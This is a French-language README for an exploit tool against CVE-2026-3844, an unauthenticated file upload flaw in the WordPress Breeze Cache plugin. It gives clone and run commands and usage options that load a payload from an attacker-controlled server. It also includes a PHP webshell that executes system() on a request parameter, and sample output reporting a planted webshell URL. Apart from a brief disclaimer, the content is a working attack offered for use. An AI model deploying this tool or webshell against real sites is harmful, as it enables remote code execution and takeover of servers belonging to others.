
WordPress - Breeze Cache <= 2.4.4 - Téléversement arbitraire de fichiers non authentifié
CET OUTIL EST FOURNI UNIQUEMENT À DES FINS ÉDUCATIVES ET DE RECHERCHE EN SÉCURITÉ.
L'accès non autorisé à des systèmes informatiques est illégal. Utilisez cet outil uniquement sur
des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.
CVE-2026-3844 est une vulnérabilité critique de téléversement de fichier arbitraire non authentifié dans le plugin Breeze Cache pour WordPress (versions ≤ 2.4.4). Le plugin ne parvient pas à valider correctement le paramètre srcset dans les commentaires, permettant à des attaquants distants de téléverser des fichiers malveillants (y compris des webshells) sur le serveur.
La vulnérabilité exploite la fonctionnalité de mise en cache Gravatar dans Breeze. Lorsqu'un commentaire est publié avec un paramètre srcset spécialement conçu contenant une URL de fichier distante, Breeze télécharge et stocke le fichier localement dans :
/wp-content/cache/breeze-extra/gravatars/[marqueur_aléatoire][extension_fichier]
Condition préalable : L'option « Héberger les fichiers localement - Gravatars » doit être activée dans les paramètres de Breeze.
# Cloner le dépôt
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# Installer les dépendances
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://cible.com
# Vérifier si la cible est vulnérable sans exploitation
python3 CVE-2026-3844.py -u http://cible.com --check-only
# Utiliser une URL de payload personnalisée
python3 CVE-2026-3844.py -u http://cible.com -p http://votre-serveur.com/payload.php
# Enregistrer la sortie dans un fichier
python3 CVE-2026-3844.py -u http://cible.com -o shells.txt
# Augmenter le délai d'attente pour les cibles lentes
python3 CVE-2026-3844.py -u http://cible.com --timeout 30
| Argument | Description |
|---|---|
-u, --url | URL cible (obligatoire) |
-p, --payload | URL du payload distant |
--timeout | Délai d'attente de la requête en secondes (défaut : 15) |
--check-only | Vérifier uniquement si la cible est vulnérable |
-o, --output | Enregistrer l'URL du shell dans un fichier |
Créez votre propre webshell (shell.php) :
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
Hébergez-le à un endroit accessible, puis utilisez :
python3 CVE-2026-3844.py -u http://cible.com -p http://votre-serveur.com/shell.php
L'exploit vérifie automatiquement la présence de la chaîne de vérification 4356452d323032362d33383434 (encodée en hexadécimal « CVE-2026-3844 ») dans le fichier téléversé pour confirmer le succès de l'exploitation.
[*] PHASE 1 : ÉVALUATION DE LA VULNÉRABILITÉ
[*] Vérification de la version du plugin Breeze...
[+] Cible VULNÉRABLE (Breeze v2.4.4)
[*] PHASE 2 : EXPLOITATION
[!] EXIGENCE : « Héberger les fichiers localement - Gravatars » DOIT ÊTRE ACTIVÉ
[*] Étape 1 : Envoi du commentaire malveillant...
[+] Commentaire publié avec succès
[*] Étape 2 : Attente de la mise en cache du fichier par Breeze...
[*] Étape 3 : Vérification du fichier téléversé...
[+] Fichier trouvé à : http://cible.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] CHAÎNE DE VÉRIFICATION TROUVÉE - EXPLOITATION RÉUSSIE !
[✓] STATUT : SUCCÈS
[✓] URL DU WEBSHELL : http://cible.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # Script d'exploitation principal
├── README.md # Ce fichier
└── LICENSE # Licence MIT
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Si vous trouvez cet outil utile, veuillez lui attribuer une étoile ⭐ sur GitHub !